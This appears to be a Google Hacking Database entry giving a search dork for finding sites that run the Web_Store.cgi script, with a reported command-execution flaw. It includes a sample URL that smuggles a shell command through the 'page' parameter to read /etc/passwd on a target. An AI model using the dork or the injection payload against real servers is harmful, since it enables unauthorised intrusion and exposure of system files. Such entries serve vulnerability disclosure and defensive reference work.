|Google Dork Description: filetype:cgi inurl:"Web_Store.cgi"||GHDB-ID: 379|
|Google Search: filetype:cgi inurl:"Web_Store.cgi"||EDB-ID: N/A|
Zero X reported that "Web_Store.cgi" allows Command Execution:This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands:http://[www.victim.com]/cgi-bin/web_store.cgi?page=.html|cat/etc/passwd|It is not know which version and has not (yet) been confirmed by the googledork forum members. That makes this search of limited use, but to an attacker it may be used as a starting point.